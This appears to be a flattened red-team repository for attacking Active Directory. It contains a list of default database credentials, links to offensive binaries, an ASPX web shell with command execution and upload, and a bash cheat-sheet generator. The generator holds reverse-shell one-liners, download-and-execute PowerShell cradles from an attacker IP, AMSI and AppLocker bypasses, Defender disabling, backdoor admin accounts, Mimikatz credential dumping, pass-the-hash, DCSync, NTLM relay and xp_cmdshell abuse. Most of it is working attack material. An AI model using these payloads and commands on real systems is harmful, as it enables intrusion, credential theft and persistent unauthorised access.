| hpdss 102 | 103 | 104 | sa 105 | 106 | 107 | 108 | sa 109 | Webster#1 110 | 111 | 112 | sa 113 | t9AranuHA7 114 | 115 | 116 | sa 117 | pcAmer1ca 118 | 119 | 120 | sa 121 | PCAmerica 122 | 123 | 124 | sa 125 | SecurityMaster08 126 | 127 | 128 | Super 129 | Orange 130 | 131 | 132 | sa 133 | mypassword 134 | 135 | 136 | sa 137 | SLXMaster 138 | 139 | 140 | sa 141 | 2BeChanged 142 | 143 | 144 | ovsd 145 | ovsd 146 | 147 | 148 | admin 149 | ca_admin 150 | 151 | 152 | test 153 | test 154 | 155 | 156 | tew 157 | tew 158 | 159 | 160 | vocollect 161 | vocollect 162 | 163 | 164 | sa 165 | 166 | 167 | 168 | sa 169 | 111 170 | 171 | -------------------------------------------------------------------------------- /bin/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ksecurity45/ADCheatgen/6a74632b56487f3645dc535f30eac5cc2233fdad/bin/.DS_Store -------------------------------------------------------------------------------- /bin/ADCollector.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ksecurity45/ADCheatgen/6a74632b56487f3645dc535f30eac5cc2233fdad/bin/ADCollector.exe -------------------------------------------------------------------------------- /bin/Advanced_Port_Scanner_2.5.3869.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ksecurity45/ADCheatgen/6a74632b56487f3645dc535f30eac5cc2233fdad/bin/Advanced_Port_Scanner_2.5.3869.exe -------------------------------------------------------------------------------- /bin/PrintSpoofer.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ksecurity45/ADCheatgen/6a74632b56487f3645dc535f30eac5cc2233fdad/bin/PrintSpoofer.exe -------------------------------------------------------------------------------- /bin/PrintSpoofer1.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ksecurity45/ADCheatgen/6a74632b56487f3645dc535f30eac5cc2233fdad/bin/PrintSpoofer1.exe -------------------------------------------------------------------------------- /bin/PsExec64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ksecurity45/ADCheatgen/6a74632b56487f3645dc535f30eac5cc2233fdad/bin/PsExec64.exe -------------------------------------------------------------------------------- /bin/Rubeus.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ksecurity45/ADCheatgen/6a74632b56487f3645dc535f30eac5cc2233fdad/bin/Rubeus.exe -------------------------------------------------------------------------------- /bin/SharpHound.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ksecurity45/ADCheatgen/6a74632b56487f3645dc535f30eac5cc2233fdad/bin/SharpHound.exe -------------------------------------------------------------------------------- /bin/SharpUp.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ksecurity45/ADCheatgen/6a74632b56487f3645dc535f30eac5cc2233fdad/bin/SharpUp.exe -------------------------------------------------------------------------------- /bin/SpoolSample.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ksecurity45/ADCheatgen/6a74632b56487f3645dc535f30eac5cc2233fdad/bin/SpoolSample.exe -------------------------------------------------------------------------------- /bin/bypass-clm.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ksecurity45/ADCheatgen/6a74632b56487f3645dc535f30eac5cc2233fdad/bin/bypass-clm.exe -------------------------------------------------------------------------------- /bin/chisel.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ksecurity45/ADCheatgen/6a74632b56487f3645dc535f30eac5cc2233fdad/bin/chisel.exe -------------------------------------------------------------------------------- /bin/chisel.exe.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ksecurity45/ADCheatgen/6a74632b56487f3645dc535f30eac5cc2233fdad/bin/chisel.exe.zip -------------------------------------------------------------------------------- /bin/nc64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ksecurity45/ADCheatgen/6a74632b56487f3645dc535f30eac5cc2233fdad/bin/nc64.exe -------------------------------------------------------------------------------- /bin/winPEASx64_ofs.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ksecurity45/ADCheatgen/6a74632b56487f3645dc535f30eac5cc2233fdad/bin/winPEASx64_ofs.exe -------------------------------------------------------------------------------- /compressedfile/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ksecurity45/ADCheatgen/6a74632b56487f3645dc535f30eac5cc2233fdad/compressedfile/.DS_Store -------------------------------------------------------------------------------- /compressedfile/HeidiSQL_11.3_64_Portable.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ksecurity45/ADCheatgen/6a74632b56487f3645dc535f30eac5cc2233fdad/compressedfile/HeidiSQL_11.3_64_Portable.zip -------------------------------------------------------------------------------- /compressedfile/Mimi_new.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ksecurity45/ADCheatgen/6a74632b56487f3645dc535f30eac5cc2233fdad/compressedfile/Mimi_new.zip -------------------------------------------------------------------------------- /compressedfile/SharpHound.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ksecurity45/ADCheatgen/6a74632b56487f3645dc535f30eac5cc2233fdad/compressedfile/SharpHound.zip -------------------------------------------------------------------------------- /compressedfile/kekeo.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ksecurity45/ADCheatgen/6a74632b56487f3645dc535f30eac5cc2233fdad/compressedfile/kekeo.zip -------------------------------------------------------------------------------- /compressedfile/processhacker-2.39-bin (1).zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ksecurity45/ADCheatgen/6a74632b56487f3645dc535f30eac5cc2233fdad/compressedfile/processhacker-2.39-bin (1).zip -------------------------------------------------------------------------------- /compressedfile/x64.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ksecurity45/ADCheatgen/6a74632b56487f3645dc535f30eac5cc2233fdad/compressedfile/x64.zip -------------------------------------------------------------------------------- /default_data/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ksecurity45/ADCheatgen/6a74632b56487f3645dc535f30eac5cc2233fdad/default_data/.DS_Store -------------------------------------------------------------------------------- /default_data/groups.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ksecurity45/ADCheatgen/6a74632b56487f3645dc535f30eac5cc2233fdad/default_data/groups.zip -------------------------------------------------------------------------------- /fileupload/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ksecurity45/ADCheatgen/6a74632b56487f3645dc535f30eac5cc2233fdad/fileupload/.DS_Store -------------------------------------------------------------------------------- /fileupload/1.aspx: -------------------------------------------------------------------------------- 1 | 29 | <%@ Page language="c#" ValidateRequest="false" %> 30 | 31 | <%@ Import Namespace="System" %> 32 | <%@ Import Namespace="System.Data" %> 33 | <%@ Import Namespace="System.Collections" %> 34 | <%@ Import Namespace= "System.Drawing" %> 35 | <%@ Import Namespace="System.Web" %> 36 | <%@ Import Namespace="System.Web.SessionState" %> 37 | <%@ Import Namespace="System.Web.UI" %> 38 | <%@ Import Namespace="System.Web.UI.WebControls" %> 39 | <%@ Import Namespace="System.Web.UI.HtmlControls" %> 40 | <%@ Import Namespace="System.IO" %> 41 | <%@ Import Namespace="System.Runtime.InteropServices"%> 42 | 461 | 462 | 463 | 464 | --------[WolF ASPX SheLL & YEE7 TeaM]------ 465 | 466 | 467 | 468 | 469 | 548 | 549 | 550 | 551 | 552 | 553 |
554 | 555 | 556 | 557 |
558 | 559 | 560 | 561 | 562 | 563 | 601 | 602 | 603 | 619 | 620 | 621 | 639 | 640 | 641 | 658 | 659 | 660 | 763 | 764 | 765 | 766 | 777 | 778 | 779 | 780 |
564 | 565 | 566 | 569 | 570 | 571 | 575 | 576 | 577 | 581 | 582 | 583 | 588 | 589 | 590 | 594 | 595 | 596 | 598 | 599 |
567 | -----------N--------------[WolF 568 | ASPX SheLL / Yee7 Team]-----------N------------
572 | 573 |   574 |
578 | 579 |   580 |
584 | 585 |   586 | 587 |
591 | 592 |     593 |
597 |  
600 |
604 | 605 | 606 | 607 | 609 |
608 | PATH INFO :
Virtual: http://<%=Request.ServerVariables["SERVER_NAME"]%><%=Request.ServerVariables["SCRIPT_NAME"]%>
1
610 | 611 |  <%=folderToBrowse%>
  613 |      616 | 617 |     
618 |
622 | 623 | 624 | 636 | 637 |
625 |   627 | 628 | 630 | 631 |   632 | 635 |
638 |
642 | 643 | 644 | 655 | 656 |
645 | [Home] 646 |    [Refresh] 647 |    648 | [Execute 649 | Command] 650 |    651 | [Upload] 652 |    653 | [Remove Self] 654 |                 
657 |
661 | 662 | 663 | 760 | 761 |
664 |   666 |   667 |              668 | 670 | 671 | 673 |       674 | 675 |          677 | 678 |
679 | 680 | 681 | 684 |
685 | 687 | 692 | 694 | 695 | 698 | 699 | 700 | 702 | 703 | 704 | 705 | <%# DataBinder.Eval(Container, "DataItem.Name") %> 706 | 707 | 708 | 709 | 710 | 711 | 712 | 716 | 717 | <%# DataBinder.Eval(Container,"DataItem.Edit") %> 718 | 719 | 720 | 721 | 722 | 724 | 725 | 726 | 727 | 731 | <%# DataBinder.Eval(Container, "DataItem.Download") %> 732 | 733 | 734 | 735 | 736 | 738 | 739 | 740 | 741 | 745 | <%# DataBinder.Eval(Container, "DataItem.Delete") %> 746 | 747 | 748 | 749 | 750 | 751 | 753 | 754 | 755 | 758 | 759 |
762 |
767 | 768 | 769 | 774 | 775 |
770 | 771 | ]----------- ThE WhitE WolF (the_white_lf_x@hotmail.com -------------------[ 772 |
773 |  ]-------------------------[Copyright 2008 @ Yee7 Team ]-------------------------[
776 |
781 | 782 | 783 |
784 | 785 | 786 | -------------------------------------------------------------------------------- /kali-generator/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ksecurity45/ADCheatgen/6a74632b56487f3645dc535f30eac5cc2233fdad/kali-generator/.DS_Store -------------------------------------------------------------------------------- /kali-generator/cheat_gen.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | VICTIM="victim.com" 4 | 5 | 6 | ####################################### 7 | # Cleanup files from the current directory. 8 | # Globals: 9 | # None 10 | # Arguments: 11 | # None 12 | ####################################### 13 | 14 | cleanup(){ 15 | echo -e "\n" 16 | echo ".....................................CLEANING UP..................................................." 17 | echo -e "\n" 18 | 19 | # Remove the directory generated for the msf payloads 20 | rm -rf msf_tmp 21 | rm ../xml/*.raw 22 | 23 | } 24 | 25 | # Remove the directories and files that were created during the process 26 | 27 | if [ "$1" == "clean" ] ; then 28 | cleanup 29 | exit 30 | fi 31 | 32 | # Define the Verified/location of all the tools 33 | 34 | current_dir=$(pwd) 35 | mkdir -p msf_tmp 36 | mkdir -p out 37 | 38 | 39 | IP=$(ip a show tun0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}') 40 | 41 | 42 | cat < nul & echo %username% 2> nul & echo. & echo Hostname: & hostname & echo. & ipconfig /all & echo. & echo proof.txt: & type "C:\Documents and Settings\Administrator\Desktop\proof.txt" 77 | 78 | # Linux 79 | echo " ";echo "uname -a:";uname -a;echo " ";echo "hostname:";hostname;echo " ";echo "id";id;echo " ";echo "ifconfig:";/sbin/ifconfig -a;echo " ";echo "proof:";cat /root/proof.txt 2>/dev/null; cat /Desktop/proof.txt 2>/dev/null;echo " " 80 | 81 | ############################################### 82 | tty shell Update 83 | ############################################### 84 | python -c 'import pty; pty.spawn("/bin/bash")' 85 | Ctrl+z 86 | stty raw -echo; fg 87 | reset 88 | export SHELL=bash 89 | export TERM=xterm-256color 90 | 91 | ################################################ 92 | Initial Shell (nc_port:446, python_port:4242) 93 | ################################################ 94 | 95 | powershell.exe -c "IEX (New-Object Net.WebClient).DownloadString('http://$IP/Verified/ps/nc.txt');" 96 | python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(($IP,4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' 97 | 98 | 99 | -------Meter_preter------------------ 100 | cmd.exe /c powershell wget http://$IP/Verified/new/payload.xml -O C:\ProgramData\payload.xml;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\ProgramData\payload.xml 101 | (New-Object System.Net.WebClient).DownloadString('http://192.168.49.57/Verified/bad.ps1') | IEX 102 | 103 | ----------Start Powershell------------------ 104 | powershell.exe -nop -ep bypass 105 | 106 | ---Powershell_repal-------- 107 | curl -o powershell-repl.csproj http://$IP/Verified/xml/powershell-repl.csproj && C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe powershell-repl.csproj 108 | 109 | 110 | 111 | ################################################ 112 | Bypass_AV_AMSI_Constrained_MODE_APPLOCKER 113 | ################################################ 114 | 115 | ----------Constrained_mode------------------ 116 | \$ExecutionContext.SessionState.LanguageMode 117 | wget http://10.10.14.105/Verified/bin/bypass-clm.exe -o C:\ProgramData\bypass-clm.exe --> exe not present. 118 | 119 | ----------AMSI BYPASS-------------- 120 | powershell.exe -nop -ep bypass 121 | (New-Object System.Net.WebClient).DownloadString('http://$IP/Verified/ps/amsi-bypass.txt') | IEX 122 | 123 | ----------Applocker Bypass----------- 124 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\ProgramData\bypass-clm.exe 125 | 126 | ---------Disable Antivirus------------ 127 | Set-Mppreference -disablerealtimemonitoring 1 128 | 129 | --------Disable Restricted_mode------ 130 | New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value 0 131 | 132 | 133 | ############################################### 134 | Privielge Escalation 135 | ############################################### 136 | PrintSpoofer.exe -i -c cmd.exe 137 | 138 | 139 | 140 | ################################################ 141 | Weaponized tools. 142 | ################################################ 143 | 144 | curl -o ADCollector.exe http://$IP/Verified/bin/ADCollector.exe 145 | curl -o nmap.zip http://$IP/Verified/nmap/nmap-7.92-win32.zip 146 | curl -o Mimi_new.zip http://$IP/Verified/compressedfile/Mimi_new.zip 147 | curl -o npcap.exe http://$IP/Verified/nmap/npcap-1.60.exe 148 | curl -o PsExec64.exe http://$IP/Verified/bin/PsExec64.exe 149 | curl -o Rubeus.exe http://$IP/Verified/bin/Rubeus.exe 150 | curl -o chisel.exe http://$IP/Verified/bin/chisel.exe 151 | curl -o SharpUp.exe http://$IP/Verified/bin/SharpUp.exe 152 | curl -o SpoolSample.exe http://$IP/Verified/bin/SpoolSample.exe 153 | curl -o SharpHound.exe http://$IP/Verified/bin/SharpHound.exe 154 | curl -o DAFT.exe http://$IP/Verified/SQLAUDIT/DAFT.exe 155 | 156 | v#TODO 157 | curl -o SQLServerClient.exe http://$IP/Verified/bin/SQLServerClient.exe 158 | curl -o PrintSpooferNet.exe http://$IP/Verified/bin/PrintSpooferNet.exe 159 | curl -o katzimim.exe http://$IP/Verified/bin/katzimim.exe 160 | curl -o MiniDump.exe http://$IP/Verified/bin/MiniDump.exe 161 | curl -o HollowEvade.exe http://$IP/Verified/bin/HollowEvade.exe 162 | curl -o FilelessLateralMovement.exe http://$IP/Verified/bin/FilelessLateralMovement.exe 163 | 164 | 165 | (New-Object System.Net.WebClient).DownloadString('http://$IP/Verified/ps/SharpHound.txt') | IEX; Invoke-BloodHound -CollectionMethod All 166 | (New-Object System.Net.WebClient).DownloadString('http://$IP/Verified/ps/PowerUp.txt') | IEX; Invoke-AllChecks | Out-File -FilePath ~\powerup.txt 167 | (New-Object System.Net.WebClient).DownloadString('http://$IP/Verified/ps/Invoke-Mimikatz.txt') | IEX 168 | (New-Object System.Net.WebClient).DownloadString('http://$IP/Verified/ps/HostRecon.txt') | IEX 169 | (New-Object System.Net.WebClient).DownloadString('http://$IP/Verified/ps/LAPSToolkit.txt') | IEX 170 | (New-Object System.Net.WebClient).DownloadString('http://$IP/Verified/ps/PowerView.txt') | IEX 171 | (New-Object System.Net.WebClient).DownloadString('http://$IP/Verified/ps/PowerUpSQL/PowerUpSQL.txt') | IEX 172 | (New-Object System.Net.WebClient).DownloadString('http://$IP/Verified/ps/Powermad.txt') | IEX 173 | (New-Object System.Net.WebClient).DownloadString('http://$IP/Verified/ps/powerviewv1.txt') | IEX 174 | 175 | \$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest 'http://192.168.49.57/Verified/bin/winPEASx64_ofs.exe' -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main('log') 176 | 177 | \$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest 'http://192.168.49.57/Verified/bin/Rubeus.exe' -UseBasicParsing | Select-Object -ExpandProperty Content)); [Rubeus.Program]::Main("dump".Split()) 178 | 179 | #TODO 180 | Invoke-ShareFinder 181 | (New-Object System.Net.WebClient).DownloadString('http://$IP/Verified/ps/nice-function.txt') | IEX; Nice-Function -dd84f627e34042a19d0e69bbfb56125d \$buf 182 | 183 | 184 | 185 | ################################################ 186 | Lateral_Moment_commands 187 | ################################################ 188 | psexec.py : 445 189 | dcomexec.py : 135,445,(49751 dcom) 190 | smbexec.py : 445 191 | wmiexec.py : 135,445,(50911 winmgmt) 192 | atexec.py : 445 193 | crackmapexec 194 | 195 | Invoke-Command -ComputerName dc02.dev.final.com -ScriptBlock {type C:\\Users\\Administrator\\Desktop\\proof.txt} 196 | 197 | evil-winrm -i 192.168.57.121 -u 'blahblah\ted' -p 'ksecurity' 198 | evil-winrm -i 192.168.57.121 -u 'blahblah\ted' -H 'e929e69f7c290222be87968263a9282e' 199 | 200 | ###################### 201 | Enable RDP 202 | ###################### 203 | # Add User 204 | net user evilme evilme /add 205 | net localgroup "Administrators" evilme /add 206 | net group ""Enterprise Admins"" offsec /add /domain 207 | New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value 0 208 | 209 | # Allow Remote Access 210 | netsh firewall set opmode disable 211 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 212 | 213 | 214 | 215 | %SystemRoot%\sysnative\WindowsPowerShell\v1.0\powershell.exe 216 | .\Rubeus.exe monitor /interval:1 /nowrap 217 | .\PsExec.exe -i -s -d powershell 218 | .\SpoolSample.exe dc02.dmzacbank.com appsrv09.dmzacbank.com 219 | 220 | 221 | mimikat# 222 | privilege::debug 223 | !processprotect /process:lsass.exe /remove 224 | sekurlsa::logonpasswords 225 | lsadump::dcsync /all /csv 226 | 227 | 228 | #kekeo 229 | tgt::delgate 230 | 231 | 232 | # Pass-The-Hash and or Restricted Admin login 233 | // if you want to connect to RDP using mimikatz 234 | sekurlsa::pth /user: /domain: /ntlm: /run:"mstsc.exe /restrictedadmin" 235 | 236 | // if you want to connect to target machine using mimikatz powershell 237 | mimikatz.exe "sekurlsa::pth /user: /domain: /ntlm: /run:powershell.exe" 238 | 239 | // if you want to connect to target machine using xfreedesktop 240 | Enter-PSSession -Computer 241 | New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value 0 242 | 243 | xfreerdp +compression +clipboard /dynamic-resolution +toggle-fullscreen /cert-ignore /bpp:8 /u: /pth: /v: 244 | xfreerdp /d: /u: /pth:HASH /v:HOST /cert-ignore -dynamic-resolution /drive:Verified,/path/to/Verified /timeout:60000 245 | 246 | 247 | ################################################ 248 | Blood-Hound Queries 249 | ################################################ 250 | Return all computers. 251 | MATCH (u:Computer) return u.name 252 | 253 | Return all nodes with outgoing permision. 254 | MATCH (n)-[r]->(g) where r.isacl = true return distinct(n.name) 255 | 256 | 257 | 258 | #################################################################################### 259 | Attacking from Linux 260 | #################################################################################### 261 | 262 | ================ 263 | Turn of automatic date and time 264 | ================ 265 | timedatectl set-ntp 0 266 | ntpdate 192.168.57.5 267 | 268 | 269 | ############################# 270 | Crackmap 271 | ############################# 272 | # Generate a list of relayable hosts (SMB Signing disabled) 273 | crackmapexec smb --kdcHost 192.168.57.5 192.168.57.0/24 --gen-relay-list relay.txt 274 | 275 | # PSEXEC 276 | crackmapexec smb 192.168.57.121 -d blahblah -u 'ted' -H ':e929e69f7c290222be87968263a9282e' -x 'whoami' 277 | 278 | # WINRM 279 | crackmapexec winrm 192.168.57.121 -d blahblah -u 'ted' -H 'e929e69f7c290222be87968263a9282e' -x 'whoami' 280 | 281 | # Password_spray 282 | proxychains4 -q crackmapexec smb 172.16.57.0/24 -u 'Administrator' -d '.' -H '8388d07604009d14cbb78f7d37b9e887' 283 | 284 | ############################# 285 | pywerview 286 | ############################# 287 | 288 | # Hint: 289 | # use --hashes if you dont have passwowrd. ) 290 | # usefull: get-netdomaintrust, get-netgroupmember, get-netshare, get-netfileserver, get-netsubnet 291 | 292 | python3.9 /mnt/hgfs/Shared_Folder/Yo/lab1/pywerview/pywerview.py get-netdomain -u 'ted' -t 'dc03.blahblah.com' -p 'ksecurity' 293 | python3.9 /mnt/hgfs/Shared_Folder/Yo/lab1/pywerview/pywerview.py get-netdomaintrust -u 'ted' -t 'dc03.blahblah.com' -p 'ksecurity' 294 | python3.9 /mnt/hgfs/Shared_Folder/Yo/lab1/pywerview/pywerview.py get-netcomputer -u 'ted' -d 'blahblah.com' -t 'dc03.blahblah.com' -p 'ksecurity' 295 | python3.9 /mnt/hgfs/Shared_Folder/Yo/lab1/pywerview/pywerview.py get-netcomputer -u 'ted' -d 'blahblah.com' -t 'dc03.blahblah.com' -p 'ksecurity' --unconstrained 296 | python3.9 /mnt/hgfs/Shared_Folder/Yo/lab1/pywerview/pywerview.py get-netcomputer -u 'ted' -d 'blahblah.com' -t 'dc03.blahblah.com' -p 'ksecurity' -spn '*' 297 | python3.9 /mnt/hgfs/Shared_Folder/Yo/lab1/pywerview/pywerview.py get-netgroup -u 'ted' -d 'blahblah.com' -t 'dc03.blahblah.com' -p 'ksecurity' | awk 'NF' > groupts.txt 298 | python3.9 /mnt/hgfs/Shared_Folder/Yo/lab1/pywerview/pywerview.py get-netgroupmember -u 'ted' -d 'blahblah.com' -t 'dc03.blahblah.com' -p 'ksecurity' --groupname PswReaders 299 | python3.9 /mnt/hgfs/Shared_Folder/Yo/lab1/pywerview/pywerview.py get-netuser -u 'ted' -d 'blahblah.com' -t 'dc03.blahblah.com' -p 'ksecurity' 300 | python3.9 /mnt/hgfs/Shared_Folder/Yo/lab1/pywerview/pywerview.py get-netuser -u 'ted' -d 'blahblah.com' -t 'dc03.blahblah.com' -p 'ksecurity' --unconstrained 301 | python3.9 /mnt/hgfs/Shared_Folder/Yo/lab1/pywerview/pywerview.py get-netuser -u 'ted' -d 'blahblah.com' -t 'dc03.blahblah.com' -p 'ksecurity' --spn 302 | 303 | 304 | # Compare Groups with the default groups and find the difff 305 | PATH : /mnt/hgfs/Shared_Folder/Verified/default_data/groups.txt 306 | cat groupts.txt | anew /mnt/hgfs/Shared_Folder/Verified/default_data/groups.txt 307 | 308 | 309 | 310 | ########################## 311 | Convert Ticket to kerbi formate. 312 | ######################## 313 | # Hint: If TGT ticket is not working please try using kekeo to get ticket tgt::delgate (This solved the problem of null sessions) 314 | 315 | cat /tmp/krb5cc_742201114_vjlDum |base64 -w 0 316 | echo '======' | base64 -d > user.ccache 317 | ticketConverter.py user.ccache user.kirbi 318 | mimikataz# 319 | kerberos::ptt user.kirbi 320 | Enter-PSSession -ComputerName web01 321 | 322 | ---From windows to linux 323 | [IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("")) 324 | 325 | 326 | ########################################## 327 | IMPACKET 328 | ########################################## 329 | # Hint: 330 | # replace -hashes with -k -no-pass (if kerberos) 331 | # IMPORTANT NOTE: DOMAIN NAME SHOULD NOT BE RETURN IN SINGLE QOUTE ELSE IT IS CASE SENSITIVE AND YOU WILL GET 332 | # USE /etc/resolve.conf #Because kerberos is bitch. 333 | 334 | # PSEXEC (Pass the Hash) 335 | impacket-psexec -hashes ":e929e69f7c290222be87968263a9282e" "blahblah/ted"@192.168.57.121 336 | impacket-psexec -no-pass -k PROD.CORP1.COM/offsec@APPSRV01.PROD.CORP1.COM -dc-ip 192.168.57.70 337 | 338 | # WMIEXEC (Pass the Hash) 339 | impacket-wmiexec -hashes ":e929e69f7c290222be87968263a9282e" "blahblah/ted"@192.168.57.121 340 | 341 | # NTLMRELAYX (NTLMV2 RELAY) 342 | impacket-ntlmrelayx.py -smb2support -t 10.10.10.1 -c 'whoami /all' -debug 343 | 344 | # Convert Ticket to kerbi formate. 345 | python ticket_converter.py ticket.kirbi ticket.ccache 346 | kirbi2ccache ticket.kirbi wow.ccache 347 | export KRB5CCNAME= 348 | 349 | # DCSYNC 350 | impacket-secretsdump -just-dc 'blahblah/pete@192.168.57.120' -hashes ":00f50c4047ef95b6349492e3eb0a1b41" 351 | 352 | # Normal pc secrets dump 353 | impacket-secretsdump 'blahblah/pete@192.168.57.121' -hashes ":00f50c4047ef95b6349492e3eb0a1b41" 354 | 355 | # Get user emails 356 | impacket-GetADUsers -no-pass -k CORP1.COM/offsec -dc-ip 192.168.57.5 357 | 358 | # Kerberoasting / relay Attacks 359 | impacket-GetUserSPNs -no-pass -k CORP1.COM/offsec -dc-ip 192.168.57.5 -outputfile lab1/output_tgs 360 | 361 | 362 | # MSSQL CONNECT & SMB RELAY ATTACK 363 | impacket-mssqlclient -no-pass -k corp1.com/offsec@appsrv01.corp1.com 364 | impacket-mssqlclient -no-pass -k corp1.com/offsec@dc01.corp1.com 365 | 366 | 367 | ########################################### 368 | # MSSQL - Queries 369 | ########################################## 370 | # https://github.com/chvancooten/OSEP-Code-Snippets/blob/main/MSSQL/Program.cs 371 | # use db "master" 372 | 373 | # Enumerate login info 374 | SELECT SYSTEM_USER; 375 | 376 | # Enumerate database username. 377 | SELECT USER_NAME(); 378 | 379 | # Enumerate if user is member of Public or Sysadmin. If role is one then true. 380 | SELECT IS_SRVROLEMEMBER('public'); 381 | SELECT IS_SRVROLEMEMBER('sysadmin'); 382 | 383 | # Force NTLM authentication for hash-grabbing or relaying 384 | EXEC master..xp_dirtree "\\192.168.49.67\share" 385 | impacket-ntlmrelayx.py -smb2support -t 10.10.10.1 -c 'whoami /all' -debug 386 | 387 | # Get logins that we can impersonate 388 | SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'; 389 | 390 | # Impersonate login and get login information 391 | EXECUTE AS LOGIN = 'sa'; 392 | use msdb; EXECUTE AS USER = 'dbo'; 393 | 394 | # Impersonate dbo in trusted database and execute through 'xp_cmdshell' 395 | use msdb; EXECUTE AS USER = 'dbo'; 396 | EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; 397 | EXEC xp_cmdshell 'whoami'; 398 | 399 | # Impersonate dbo in trusted database and execute through 'sp_OACreate' 400 | use msdb; EXECUTE AS USER = 'dbo'; 401 | EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE; 402 | DECLARE @myshell INT; EXEC sp_oacreate 'wscript.shell', @myshell OUTPUT; EXEC sp_oamethod @myshell, 'run', null, 'whoami'; 403 | 404 | ######## 405 | # Enumerate linked servers 406 | ######## 407 | EXEC sp_linkedservers; 408 | Linked SQL server: DC01 409 | 410 | 411 | ######### 412 | # Execute on linked server 413 | ######### 414 | EXECUTE AS LOGIN = 'sa'; 415 | EXEC sp_serveroption 'SQL03', 'rpc out', 'true'; 416 | EXEC ('sp_configure ''show advanced options'', 1; reconfigure;') AT SQL03; 417 | EXEC ('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT SQL03; 418 | EXEC ('xp_cmdshell ''whoami'';') AT SQL03; 419 | EXEC ('xp_cmdshell ''powershell.exe -exec bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQAOQAuADUANwAvAFYAZQByAGkAZgBpAGUAZAAvAHAAcwAvAG4AYwAuAHQAeAB0ACcAKQA7AA=='';') AT SQL03; 420 | 421 | ############ 422 | # Execute on linked server via 'openquery' 423 | ############ 424 | select version from openquery("dc01", 'select @@version as version') 425 | select 1 from openquery("dc01", 'select 1; EXEC sp_configure ''show advanced options'', 1; reconfigure') 426 | select 1 from openquery("dc01", 'select 1; EXEC sp_configure ''xp_cmdshell'', 1; reconfigure') 427 | select 1 from openquery("dc01", 'select 1; exec xp_cmdshell '"powershell whoami"') 428 | select * from openquery("sql03",'exec master..xp_cmdshell "powershell whoami"') 429 | 430 | ############ 431 | # Escalate via double database linkedString 432 | ############## 433 | 434 | # Enabling advanced options on appsrv01 using AT 435 | EXEC ('EXEC (''sp_configure ''''show advanced options'''', 1; reconfigure;'') AT appsrv01') AT dc01 436 | 437 | # Find the login on DC01 438 | select mylogin from openquery("dc01", 'select SYSTEM_USER as mylogin'); 439 | 440 | # Finding the login on APPSRV01 after following the links 441 | select mylogin from openquery("dc01", 'select mylogin from openquery("appsrv01", ''select SYSTEM_USER as mylogin'')') 442 | 443 | select * from openquery("dc01", 'select * from openquery("appsrv01", ''select (SYSTEM_USER)'')') 444 | EXEC ('EXEC (''sp_configure ''''show advanced options'''', 1; reconfigure;'') AT appsrv01') AT dc01 445 | EXEC ('EXEC (''sp_configure ''''xp_cmdshell'''', 1; reconfigure;'') AT appsrv01') AT dc01 446 | EXEC ('EXEC (''xp_cmdshell ''''whoami /priv'''';'') AT appsrv01') AT dc01 447 | 448 | 449 | ############################## 450 | Powerup SQL 451 | ############################## 452 | # Find sql servers 453 | Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose 454 | 